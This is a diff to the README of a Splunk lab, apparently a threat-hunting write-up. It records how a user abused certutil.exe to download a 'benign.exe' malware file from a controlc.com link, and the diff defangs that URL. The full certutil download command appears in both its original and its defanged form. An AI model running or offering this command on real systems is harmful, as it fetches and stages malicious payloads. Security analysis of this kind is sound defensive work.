RyanSalomon/Splunk-Lab/README.md

 Outcome:

-- User Haroon used certutil.exe (a LOLBIN) to download a payload from https://controlc.com/e4d11035, indicating the use of a file-sharing service (controlc.com) to deliver the benign.exe malware file.
+- User Haroon used certutil.exe (a LOLBIN) to download a payload from https ://controlc.com/e4d11035, indicating the use of a file-sharing service (controlc.com) to deliver the benign.exe malware file.

 Details of the Findings:

-- LOLBIN used: certutil.exe -urlcache -f - https://controlc.com/e4d11035 benign.exe
+- LOLBIN used: certutil.exe -urlcache -f - https ://controlc.com/e4d11035 benign.exe

 - Purpose of certutil.exe: Originally designed for certificate management but abused to download files from the internet.